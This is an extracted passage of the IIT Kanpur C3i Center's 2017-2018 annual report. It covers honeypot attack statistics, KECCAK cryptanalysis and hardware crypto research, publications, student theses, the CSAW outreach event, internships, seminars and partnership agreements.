files from which 13 are for Windows OS and remaining are for Linux OS.

Table 10: Unique IPs in Percentage attacking various Service Honeypots

Protocol Number of Unique IPs which attacked(in %)

Page 29: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 29

Telnet 25.06 SSH 20.52 WEB-SQLi 16.32 Web 5.61 SMB 6.31 CWMP 9.33 FTP 7.63 DB 9.18

Page 30: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 30

Figure 14: A sample of Analytics on the attacks found on IIT Kanpur Network by our Honeypots

• HoneyWEB-SQLi was deployed for around one month of time on various

location in the world with cloned www.cse.iitk.ac.in website, It received

around 3682 attacks from 771 different IPs. Different types of attack

observed on this honeypot include shell request, beast attack,

phpMyAdmin interface exploit, scanners and crawlers, wrong request and

DNS attack.

• HoneyDB was deployed over a period of 25 days in various countries

around the globe. Honeypot was deployed under two scenarios with two

different username and password. It obtained a total of 18435 attack from

1261 unique IPs. In scenario 1 with username and password both as

‘admin’ only 1561 connection requests came out of which only 3 IPs

managed to do something with database. In scenario 2 with username and

password as ‘root’ 12290 connection requestscame, many attacks were

observed with 4 of them able to create new user via backdoor.

References-

HoneyFARM - https://github.com/r0hi7/HoneySSH

Augmented ssh client - https://github.com/r0hi7/ssh4honeypot

HoneyFTP - https://github.com/nishitm/HoneyFTP

HoneyWEB - https://github.com/r0hi7/HoneyWEB

IOT HONEYPOTS DEPLOYED

• We aggregated MQTT protocol (a protocol commonly used by IoT devices)

which received various CVE(Common Vulnerabilities and Exposures) in

2017.

• We placed MQTT Broker inside SSH honeypot and made it interact with the

simulated IoT devices

• The honeypots were deployed in different locations such as India,

Amsterdam, and Canada cloud servers for more than a month and received

attacks from a total of 2576 unique hosts.

Page 31: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 31

• Username ‘root’ and password ‘root’ were most common in the list of

usernames and passwords used in the connect packet sent in attempt to

brute force MQTT broker.

• Connect Packet Flooding, SYN packet flooding, Privilege escalation by

setting client id to ‘#’, Tampering of IoT devices data by manipulating data

of topic on which they were subscribed were some of the common attacks

observed.

Table 11: Attack Statistics from IPs belonging to various Countries on our IoT Honeypots

Country Number of Unique Hosts attacked

China 28.44 USA 26.21 Korea 5.94 Brazil 5.65 Russia 5.01 Vietnam 4.38 France 4.38 India 3.82 Others 16.17

:

Figure 14: Distinguishing Script Based Attacks and Manual Attacks based on inter-command Latency

Page 32: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 32

References-

SSH Honeypot- https://github.com/shbhmsingh72/wetland

MQTT Broker- https://github.com/shbhmsingh72/hbmqtt

Page 33: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 33

CRYPTANALYSIS AND CRYPTO ENGINEERING

One objective of the center is to find mathematical attacks on recent Hash

functions as hash functions are now gaining more importance due to their

pervasive use in Block chains and crypto-currency. Some interesting results

obtained by the researchers at the center are as follows:

Cryptanalysis of 1-Round KECCAK

KECCAK was designed by Guido Bertoni, Joan Daemen, Michal Peeters, and Gilles

Van Assche and was selected as the winner of the competition and in 2015, it was

standardized as a “Secure Hash Algorithm 3”. Due to its vast applications, a lot of

security analysis is being performed on the KECCAK hash family.

In our recent work, we give the first preimage attack against 1-round KECCAK-512

hash function, which works for all variants of 1-round KECCAK. The only

computation required in this attack is solving 384 linear equations. It is based on

exploiting the degree of freedom in the equations between hash values and

message bits and converting these equations to simple assignments of values to

message variables. Using this method, we can find a message of length less than

1024 bits corresponding to every hash value. Also, the time complexity of this

attack is constant.

The above preimage attack was implemented in C++ using the NTL library from

Victor Shoup. The code was executed on a laptop with Intel Core i5-7200

processor and 16GB RAM giving the preimage in less than 0.005 seconds.

This result was presented at AFRICACRYPT 2018 which was held at Marrakesh,

Morocco on May 7-9, 2018.

Resource Efficient Implementation Crypto-primitives in Hardware

For implementation of modern network protocols such as IPSec, one needs to

encrypt, decrypt and hash at the line-speed. This implies that we need efficient,

low-power hardware implementation of cryptographic algorithms. Below, we

give a summary of our work in last one year in this area.

Page 34: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 34

VLSI ARCHITECTURES FOR CRYPTO PRIMITIVES

In this work, we consider the hardware implementations of a number of

cryptographic primitives and present a number of optimizations. Here, the

following areas are focused.

(1) High Throughput Galois Field (GF) Multipliers - Vector GF(2^m) and m-

bits GF(p) multipliers are proposed to perform multiple GF(2^{m/2}) and

GF(2^{m/4}) multiplications using one GF(2m) multiplier. Similarly, Vector m-bits

GF(p) multipliers are proposed to perform m/2-bits GF(p) and m/4-bits GF(p)

multiplications using one m-bits GF(p) multiplier, where m=log2 p. Also, this

paper proposes non-vector flexible GF(2^m) and m-bit GF(p) multipliers, where

the m can be varied from 2 to the maximum allowable value.The proposed

systolic vector parallel GF(2^{16}) multiplier achieves 95.8% of improvement in

throughput over reconfigurable bit serial design using 45nm CMIOS technology

with Cadence Genus/Innovus 15.20. Figure 14 shows the operation of the

proposed systolic parallel versatile non-vector GF (2^4) LSB first multiplier, where

GF(2^3) and GF(2^3) multiplications can be done using GF(2^4) multiplier.

(2)

Low Power Asynchronous Crypto Primitives - The GF multipliers,

multiplicative inverse, exponentiation, 128-bit AES, and affine co-ordinate based

Figure 15: : Operation of the proposed systolic parallel versatile non-vector GF (2^4) LSB first multiplier

Page 35: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 35

GF(2^{163}) ECC are designed in asynchronous way, where the hardware is

repeatedly reused for a number of iterations without synchronous registers using

a asynchronous completion detection logic. This reduces the power dissipations

as compared with various existing techniques. For example, the proposed

asynchronous GF(2^{16}) multiplier design achieves 99.6% of improvement in

switching power reduction than scalable Montgomery based multiplier using

45nm CMOS technology with Cadence Genus/Innovus 15.20. Figure 15(d) shows

the proposed asynchronous design, where the recharge stage uses the FSM to get

the inputs from the input ports or from the previous output. The COMBO is to

perform the operation and CTL (control logic) is to find whether the present

operation is completed or not. It the operation is completed, then done signal

will be high. Now, the FSM will take this output as the input for next operation.

(3) Low Power Network Packet Processing Elements - This research work

involves the various hardware optimizations on payload matching, packet

classification, and backplane switchinterconnects by allowing architectural

changes in the existing designs. Here, asynchronous Bloom filter-based payload

matching, look up/decision tree based packet classification with clock gating, and

multiplexer based buffered cross-bar backplane are used to achieve low power

dissipations. For example, the proposed asynchronous Bloom filter-based

payload match architecture achieves 94.9% of reduction in PDP over Cuckoo

design using 45nm CMOS technology with Cadence Genus/Innovus 15.20.

(4) Flexible LFSR based Dividers for BCH and RS Error Correction

Encoders - This work proposes the LFSR based serial/parallel flexible and vector

divider architectures used in the BCH and Reed Solomon (RS) ECCs. Also, this work

elaborates the versatile hardware implementations of BCH and RS based Turbo

product codes (TPCs) using the serial flexible/vector dividers. The proposed

flexible architectures are used to perform the division operation with variable

length of generator polynomial in BCH and RS based ECCs. The proposed vector

architectures are used to perform multiple division operations in parallel to

improve the throughput. The synthesis results using 45nm CMOS technology

show that the proposed designs achieve significant improvement over the

existing designs. For example, the LFSR based proposed serial vector dividers

Page 36: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 36

achieve 47.1% and 83.3% of improvement in throughput as compared with the

conventional designs for BCH encoder with a length of generator polynomial 65

and RS encoder with a length of generator polynomial 17 respectively with

Cadence Genus/Innovus 15.20.

(5) Efficient Hardware-Software Codesigns of AES Encryptor and RS-BCH

Encoder - This work proposes efficient hardware-software codesigns for AES

encryptor and RS-BCH concatenated encoder, where the latency and hardware

cost lie in between the fully hardware and software based designs. In the

proposed AES folded codesign, we do not use the synchronous registers. In the

proposed RS-BCH concatenated encoder, the entire design is partitioned into

two, the less intensive task with the software and the heavy intensive task with

the hardware. The synthesis results show that our proposed hardware-software

codesigns of 128-bit AES and RS(255,239)-BCH(2184,2040) serial concatenated

error correction encoder achieve 85% and 40% of reduction in switching power

dissipation over the conventional folded 128-bit AES folded design and fully

hardware based RS-BCH concatenated encoder design using Artix-7 FPGA

implementation respectively. Figure 16 shows the block diagram of the AES/RS-

BCH co-processor connected with 32-bit Microblaze using Xilinx Vivado.

Page 37: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 37

Figure 18: Block diagram of the AES/RS-BCH co-processor connected with 32-bit Microblaze using Xilinx Vivado

Tools/Equipments Used:

(1) Artix-7 Nexys-4 FPGA (XC7A100T-CSG324) Evaluation Board using Xilinx

Vivado

(2) Cadence Genus/Innouvs 15.20 with 45nm CMOS technology library (gsclib045

-- fast_vdd1v0_basicCells.lib)

PUBLICATIONS – CONFERENCES/JOURNALS

1. Mohamed Asan Basiri M and Sandeep K. Shukla, “Efficient Hardware-

Software Codesigns of AES Encryptor and RS-BCH Encoder”, International

Symposium on VLSI Design and Test (VDAT), 2018 (accepted for oral

presentation).

2. J. G. Sreenath, S. Mangalwedekar, A. Meghwani, S. Chakrabarti, K. Rajawat,

and S. C. Srivastava, "Impact of GPS Spoofing on Synchrophasor Assisted

Load Shedding", PES general meeting in Portland, Oregon, Aug 5-9 2018

(Accepted).

Figure 16: : (a) The circuit with synchronous pipeline, (b) Asynchronous pipeline with glitches due to delay imbalance in the forward path, (c) Existing asynchronous pipeline without glitches

(absence of delay imbalance in the forward path), (d) Proposed glitch f

Page 38: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 38

3. Rajendra Kumar,Mahesh Sreekumar Rajasree and Hoda AlKhzaim,

"Cryptanalysis of 1-Round KECCAK", Springer International Publishing AG,

part of Springer Nature 2018.

4. Mohamed Asan Basiri M and Sandeep K. Shukla, “Flexible Composite Galois

Field GF ((2^m)^2) Multiplier Designs”, International Symposium on VLSI

Design and Test (VDAT), Communications in Computer and Information

Science, Springer, vol. 711, pp. 3-14, June 2017, India.

5. Mohamed Asan Basiri M and Sandeep K. Shukla, "Low Power Hardware

Implementations for Network Packet Processing Elements", Integration,

the VLSI Journal, vol. 62, pp. 170-181, June 2018 .

6. Debleena Das, Ansuman Banerjee, Sandeep K. Shukla, "An automata

theoretic framework for detecting schedulability attacks on cyber-physical

systems", EAIT 2018 : Fifth International Conference on Emerging

Applications of Information Technology, 2018 .

7. Shubham Sharma, Rahul Gupta, Shubham Sahai Srivastava and Sandeep K.

Shukla, "Detecting Insider Attacks on Databases using Blockchains",

ACMSIGSAC Conference on Computer and Communications Security, 2017.

8. S.Venkatesan, Shubham Sahai Srivastava and Sandeep Kumar Shukla,

"Decentralized Authentication of IoT devices using Blockchain", 2nd

Advanced Workshop on Blockchain: Technology, Applications, Challenges ;

IIT Bombay, 2017.

9. Mohamed Asan Basiri M and Sandeep K. Shukla, "Flexible VLSI

Architectures for Galois Field Multipliers", Integration, the VLSI Journal,

vol. 59, pp. 109-124, 2017.

10. Prachi Joshi, S. S. Ravi, Soheil Samii, Unmesh Bordoloi, Sandeep Shukla,

Haibo Zeng, "Offset Assignment to Signals for Improving Frame Packing in

CAN-FD", accepted for IEEE Real-Time Systems Symposium (RTSS 2017).

Paris, France, December 2017, 2017.

Page 39: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 39

11. Rourab Paul and Sandeep Kumar Shukla, "A High Speed KECCAK

Coprocessor for Partitioned NSP Architecture on FPGA Platform", VDAT

2017: 21st International Symposium on VLSI Design and Test, 2017.

12. Sandeep K Shukla, "Editorial: Distributed Public Ledgers and Block Chains—

What Good Are They for Embedded Systems?", ACM Transactions on

Embedded Computing Systems (TECS), 2017.

TECHNICAL REPORTS

1. Detecting Insider Attacks on Databases using Blockchains

Shubham Sharma, Rahul Gupta, Shubham Sahai Srivastava and Sandeep K.

Shukla

2. Flexible VLSI Architectures for Galois Field Multipliers

Mohamed Asan Basiri M and Sandeep K Shukla

3. Hardware Optimizations for Crypto Implementations

Mohamed Asan Basiri M and Sandeep K Shukla

4. Flexible Composite Galois Field GF((2^m)^2) Multiplier Designs

Mohamed Asan Basiri M and Sandeep K Shukla

5. A High Speed KECCAK Coprocessor for Partitioned NSP Architecture on

FPGA Platform

Rourab Paul, Sandeep K Shukla

6. A SCADA test bed For Cyber Security Education & Research

Rohit Negi, Abhay Kumar, Saurabh Kumar, Sandeep K Shukla, Avik Dayal

Page 40: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 40

HUMAN RESOURCE DEVELOPMENT

PhD Theses(On going)

Student Name Thesis Topic

Abhay Kumar Cyber Security of Software Define Networks

Saurabh Kumar A Framework for Sandboxing and Dynamical Analysis for Android

Malware

Shubham Sahai

Srivastava

Formal Analysis and Verification of Security Protocols and Block

Chain Protocols

Rajendra Kumar Hardness of Lattice problems

Mahesh Sreekumar

Rajasree

Algorithms for lattice Problems and Lattice based Cryptography

Gufran Siddique Mobile Agents based Cyber Defense Immune System

M. S. Thesis (On going)

Student Name Thesis Topic

Rohit Negi SCADA Security, SCADA Test Bed Design and Vulnerability/Threat

Intelligence

Aneet Dutta Intrusion Detection in Cyber Physical Systems with Anomaly

Detection

M. Tech Thesis (Completed)

Student Name Thesis Topic

Amit Kumar PeerClear: Peer-to-Peer Botnet Detection

Shubham Singh Cloud Based IoT Honeypot for MQTT Protocol

Anmol Kumar

Shrivastava

Linux Malware Detection by Hybrid Analysis

Gaurav Kumar Automatic malware detection using memory forensics

Mugdha Gupta Early Stage Malware Classification using Behavior Analysis

Vineet Purswani Clustering for hybrid malware analysis and multi-path execution

Ajay Singh Malware Classification using Image Representation

Pranjul Ahuja Robust Malware Detection using Integrated Static and Dynamic

Analysis

Saptarshi Gan An IoT simulator in NS3 and a key-based authentication architecture

for IoT devices using blockchain

Page 41: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 41

Rohit Sehgal Tracing Cyber Threats with Honey-systems

Nishit Majithia Honey-System: Design, Implementation & Attack Analysis

Krishnaprasad P Capturing attacks on IoT devices with a multi-purpose IoT honeypot

UGP Projects (Completed)

Student Name Thesis Topic

Prakhar Agrawal Exploiting Media Projection Vulnerability in Android 7 and below.

Nilesh Vasita Verifiable billing in Electric Vehicle charging infrastructure using

blockchain

Arham Chopra Lightweight Security in SCADA Systems

Dhruv Kumar Secure Authentication in Content Management System (CMS)

Saksham Sharma Study and Implementation in Haskell

Shikhar Mahajan Enegiota: A scalable and feeless billing DApp on Tangle

OUTREACH TO RAISE AWARENESS ABOUT CYBER SECURITY

CSAW 2017

Cyber Security Awareness Week (CSAW), was successfully introduced to India in

2016 by IIT Kanpur, Dept. of CSE in partnership with NYU, Tandon School of

Engineering, its second edition commenced in 2017 (9th -11th November). The

event was co-hosted at four locations i.e. North America, Europe, India and

Middle-east.

Page 42: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 42

In its second year, the

cyber security

competition has

expanded significantly,

evident from the

increased participation

and performance of the

students. Raising the

total number of

participants for CSAW

finals from 44 in 2016 to

64 in 2017. To expand its outreach, a new category of Professional team was

introduced this year under Capture the Flag, which is a 36 hour around the clock

software hacking contest.

The three-day event witnessed participation of over 52 students, research

scholars and 12 professionals on PAN India basis. Out of which total 14 teams (10

teams under the student category and 4 teams under professional category) from

India anticipated in Capture the Flag, 2 teams from IIT Kharagpur and Madras in

Embedded Security Challenge, 1 team from BHU Law School in Law & Policy

Competition and 8 paper presentations for the Applied Research Competition.

On the day one of CSAW’17 a series of invited talks was arranged, considering it

as a knowledge exchange platform benefitting students in return. Speakers

invited represented academia (Indian Statistical Institute, Kolkata; IIT

Kharagpur), industry (Nivetti Systems), entrepreneurs/start-ups (Gratia

Technology) and professional hackers (Bugs Bounty Hunters) working in the cyber

security arena.

Under the multiple competitions being hosted at CSAW, Capture the Flag (CTF) is

the flagship event, inviting hackers to compete and showcase their skills globally.

Finalists under CTF included participants from BITS Pilani, Amrita University

Amritapuri, IIIT Allahabad, NIT Kurukshetra, IIT Roorkee, IIIT Delhi and IIT Indore.

Based on performance, their global ranking was remarkable, under student

Page 43: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 43

category winning team ‘InfosecIITR’ (IIT Roorkee) stood 10th in the world ranking

while the first runner up team ‘Pirates from the Kernel’ (IIT Indore) and the

second runner up team ‘D4rkcode’ (IIIT Delhi) stood 16th and 19th in the world

ranking, respectively.

In the professional category, winning team ‘pwnpeiii’ stood 14th in the world

ranking while the runner’s up team ‘Bytebandits’ stood at the 15th position.

Embedded Security Challenge is a hardware hacking challenge, wherein

participants were required to hack into a target system designed by NYU Tandon.

In India, the finalist teams were from IIT Madras and Kharagpur. They competed

with each otherthrough power-point presentations followed by poster

presentations. IIT Madras won over IIT Kharagpur in this challenge.

Applied Research competition primarily encourages young researchers to

present their papers along with posters. This

competition received 14 paper submissions

from various institutes e.g., IIT Indore, IIT

Kharagpur, IIIT Delhi and IIT Madras. Out of

these 14 papers, 8 papers were shortlisted

and invited for 20-minute presentations.

The first position was secured by a team from

IIT Kharagpur while the second and third positions went to teams from IIT Madras

and IIT Kharagpur respectively.

team from Law School, BHU participated in Law & Policy competition, wherein

participants must develop a policy paper on a given prompt. This year’s prompt

given by IIT Kanpur was: “Policy interventions to solve fake news endemic”.

These competitions were judged by cyber security experts from IIT Kharagpur, IIT

Ropar, VECC, Kolkata, Industry (Nivetti Systems), CDAC-Mohali, and IIT Kanpur

except the CTF which was played online on a global CTF platform. CSAW brings

the C3I centre of the Computer Science department, IIT Kanpur at par with the

Cyber Security centre at NYU in terms of outreach for creating awareness on

Cyber Security.

Page 44: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 44

CSAW’18 is scheduled to be held on 8-11 November, 2018 simultaneously at four

international locations. This year, CSAW will come up with a new integrated

website for all the regional partners. This site will act as one source of information

for worldwide participants/audience, bringing all the regional partners together

and transparent. September 14-16, 2018 are the dates finalized for CTF prelims

round, registration for the same will be open in a day or two.

This year with the hope of expansion, CSAW-India plans to modify Embedded

Security Challenge competition and bring it on more of a CTF platform to

approach dedicated hardware security personnel. Under the Applied Research

Competition this year aim is to set up a scrutinizing committee comprising of

academicians and professionals for a fairer game and engagement of experts.

Industries/C3I partners are also aimed to be approached for setting up industry

fair and to address students and participants. With the number of CSAW-India

Facebook page followers reaching to 423 we expect more countrywide

participation of cyber security students and professionals in making to enhance

their skills through this platform.

SUMMER INTERNSHIP PROGRAM

Year: 2017

Student Name College/University Topic

Subhasis

Mukhopadhyay

West Bengal University of

Technology Attacks in Android

Akshat Aggarwal Indian Institute of

Information Technology,

Allahabad

Cyber Threat Intelligence Analysis

Mazhar Imam Khan Indian Institute of

Engineering Science &

Technology, Shibpur

Telpot - Capturing Cyber Attacks

with generic Telnet Based Honeypot

Aditya Srivastava University of Petroleum &

Energy Studies

Detection of Cyber Attacks In

Industrial Control Systems Using

Neural Networks

Sagar Sharma KNIT, Sultanpur Application Vulnerabilities, Issues

and Mitigation

Page 45: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 45

Shubham Pandey Lucknow University Malware Analysis

Shobhit Rastogi IIT Kanpur SMTP by Public Key Cryptography

Dipanwita Mukherjee West Bengal State University A browser add-on for Alerting users

against Phishing Site Accesses

Jayadeep Reddy Ganta National Institute of

Technology, Tiruchirapalli

Implementation of ZUC Algorithm

on FPGA

Utsava Verma Manipal Institute of

Technology, Manipal

Malware Analysis with Machine

Learning

Ashish Gahlot Govt. Engineering College,

Ajmer

Vulnerability Assessment of Industrial Control System

Amodini Vardhan Manipal Institute of

Technology, Karnataka

Design and Implementation of a

Web-based Scalable, Secure and

attributional grade management

system

Mugdha Jadhao IIT Roorkee Designing coprocessor for

implementing crypto-algorithm

'Snow3g'

Mohit Sharma Ashoka University Malware Analysis with Machine

Learning

Year: 2018

Student Name College/University

Shyam Sunder Tiwari Institute of Engineering and Technology, Lucknow

Shankhadip Mallick University of Engineering & Management, Jaipur

R. Akashraj MIT, Manipal

Akhil P Cochin University of Science and Technology, Kerala

Saubhagya Srivastava University of Petroleum & Energy Studies

Gowtham Chitipolu IIT Gandhinagar

Chamandeep Singh NIT Tiruchirappalli

Shivanshu Singh IIT Kanpur

Raghul M Amrita University

Ashwin Sekhari National Institute of Technology, Rourkela

Satish Sripadam National Institute Of Technology, Tiruchirappalli

Rishav Chatterjee KIIT University

Mohammed Israil Gandhi Engineering College, Odisha

Page 46: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 46

AKTU Interns 2018

Student Name Topic

Pratishtha Saxena Deep Packet Inspection (DPI) in Network.

ParulGahelot Deep Packet Inspection (DPI) in Network.

Monika Detection of loopholes in web application

Anam Fatima Android app for detection of malicious Apps on the device

Areeba Irshad Classification of malware analysis and preventing the attacks

Ankita Detection of Malware in Advance Android Apps By using the Static

Analysis

Kumar Shanu Singh Cloud based IOT Honeypot

Shikha Malware analysis, Security monitoring tool.

Vishal Choudhary A Runtime analysis to detect malware

Arvind Goutam Practice various webapp based attacks and detect the vulnerability

Nitesh Kumar A hybrid approach to detect advanced malware at large scale

SEMINARS

Seminar's by the Center Faculty:

1. Prof. Sandeep Shukla is an invited speaker on "Blockchain for E-

Governance" at the Workshop on Blockchain at the Indian Statistical

Institute Kolkata in November 2018.

2. Prof. Sandeep Shukla is an invited speaker on "Cyber Security of Digital

Financial System" at RBI Lucknow for their cyber security awareness

campaign week in October 2018.

3. Prof. Sandeep Shukla was an inaugural speaker at the launching of the ACM

student chapter at the Indian Institute of Information Technology,

Allahabad, in Feb 2018.

4. Prof. Sandeep Shukla was an invited speaker and panel moderator at the

2nd Cyber Security Conference organized in Hyderabad in December 2017.

Page 47: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 47

5. Prof. Sandeep K. Shukla was a keynote speaker at the International Forum

on Design Languages (FDL 2017) on "Do Design and Specification Languages

have any role to Play in Cyber Security?" held in Verona, Italy during

September 18-20, 2017.

6. Prof. Sandeep K. Shukla was an invited speaker at the Cyber Security Week

organized by the Blavatnik Interdisciplinary Center for Cyber Security at Tel

Aviv, Israel on June 28, 2017 on academic perspective of cyber security.

7. Prof. Sandeep Shukla was a keynote speaker at the 23rd IEEE International

Conference on Embedded and Real-Time Computing Systems and

Applications (RTCSA'17) on "Cyber Security of Cyber Physical Critical

Infrastructures: A Case for a Schizoid Design Approach" to be held during

August 16-18, 2017 in Taiwan.

8. Prof. Sandeep K. Shukla was an invited speaker at inauguration of RBI

Kanpur Information Security Awareness Campaign, May 2017.

9. Prof. Sandeep K. Shukla was an invited on membership in the subgroup on

mobile banking & security, and subgroup on card based payments &

security formed by Reserve Bank of India's standing committee on Cyber

Security.

10. Prof. Sandeep K. Shukla delivered an invited talk on How Safe are our

Critical Infrastructures from Cyber Attacks held at IIIT Delhi on 11th Feb,

2017.

Seminars and Events Organized at the Center

Topic Speaker's Name Date

Walking the edge between structure and

randomness: New constructions for

Obfuscation and Functional Encryption

Prof. Shweta Agrawal,

IIT Madras

Thu, 05/10/2018

Page 48: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 48

Smart Living: The Next Frontier Prof. Sajal K. Das, IEEE

Fellow, Daniel St. Clair

Endowed Chair, Missouri

University of Science

and Technology, USA

Fri, 01/12/2018

Planar Graph Perfect Matching is in NC Vijay V. Vazirani,

University of California,

Irvine

Wed, 01/03/2018

Taming Timing Uncertainties for New

Generation of Cyber-Physical Systems and

Applications

Rajesh K. Gupta, UCSD Fri, 12/29/2017

Towards Secure and Privacy-aware Cyber-

Physical Systems and IoT

Mani Srivastava, UCLA Fri, 12/29/2017

Introduction to Biochip Security Ramesh Karri (New York

University, New York)

Tue, 08/22/2017

Cyber-Security: Analog Side Channels of

Embedded Cyber-Physical Systems

Farshad Khorrami (New

York University, New

York)

Tue, 08/22/2017

Cryptanalysis of Selected Symmetric

Ciphers: Lightweight Choices for Secure

Hardware

Hoda A. Alkhzaimi, New

York University Abu

Dhabi

Tue, 08/22/2017

Do You Trust Your Chip? Ozgur Sinanoglu (New

York University at Abu

Dhabi)

Tue, 08/22/2017

Invited Talk by Sujoy Sinha Roy Sujoy Sinha Roy Fri, 07/07/2017

MEMORANDUM OF UNDERSTANDING

Academic MOUs

IIT Kanpur, Gujarat State Forensic University, and New York University has

entered into a tri-partite MoU to collaborate on Cyber Forensics, Cyber Threat

Intelligence, developing MOOC courses, etc.

Page 49: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 49

The IITK- Center for Cybersecurity for Critical Infrastructure (IITK-CCS) and the

NYU Tandon School of Engineering - Center for Cyber Security (CCS) (NYU-CCS)

and the Gujarat Forensic Sciences University (Institute of Forensic Science and

Institute of R&D) missions have a lot in common. In order to better fulfill their

respective missions, representatives from the institutes have exchanges views on

establishing relationships and a program of cooperation among the Institutes.

Major Objectives to collaborative activities in the academic areas of mutual

interest, on a basis of equality and reciprocity are:

i. Student and Faculty Exchanges among the Institutes;

ii. Creating joint MOOC courses together;

iii. Going for government and industrial funding together in the areas as

mentioned in

iv. Explore possibility of joint degree programs in the future;

v. Developing Intellectual Property together.

Industry MOUs

C3I center signed an MoU with InfoSec Ventures -- an India based company

focused on Cyber Security solutions, to cooperate on "crowd-sourcing" based

information security techniques to enhance resilience of human layer in cyber

and information security, automation of digital resilience techniques, and

current/future challenges. More information on InfoSec Ventures can be found

at https://www.zaubacorp.com/company/INFOSEC-VENTURES-PRIVATE-

LIMITED/U74140DL2011PTC219378 .

TCG MOU

IIT Kanpur and TCG Digital, a pioneer in setting up the first commercially available

cyber range in India, have signed an MOU to jointly offer hands on technical

training and consultancy services in the cyber security domain. These services are

primarily based on a state of the art Cyber Range capable of modeling hyper real

Page 50: National Interdisciplinary Center for Cyber Security and Cyber … · 2019-12-19 · courses in cyber security, and also summer internships at C3I center, and training programs for

C3i Center | Annual Report 2017 - 2018 50

cyber-attacks and complex networked environments to serve Security Agencies,

Defense Establishments, Government Departments and enterprises in the Public

and Private Sectors. The Cyber Range offers a pragmatic and sustainable strategy

for arming organizations to assess, educate, and certify a national force of Cyber

Warriors to carry out information assurance (IA), information operations (IO),

and mission assurance (MA) duties. The services would assist to train the people,

validate processes and optimize the technology solutions deployed and thus

reorient the People, Process and Technology triad for the real world cyber

security scenarios by allowing them to “train as they fight”. Under the MOU

signed between Computer Science Department of IIT Kanpur and TCG Digital

Solutions Pvt Ltd, high end customized technical training, consultancy projects,

seminars and workshops would be offered to help security and IT staff of an

organization sharpen their skills and enhance their experience that is necessary

to combat modern cyber threats.


Top Related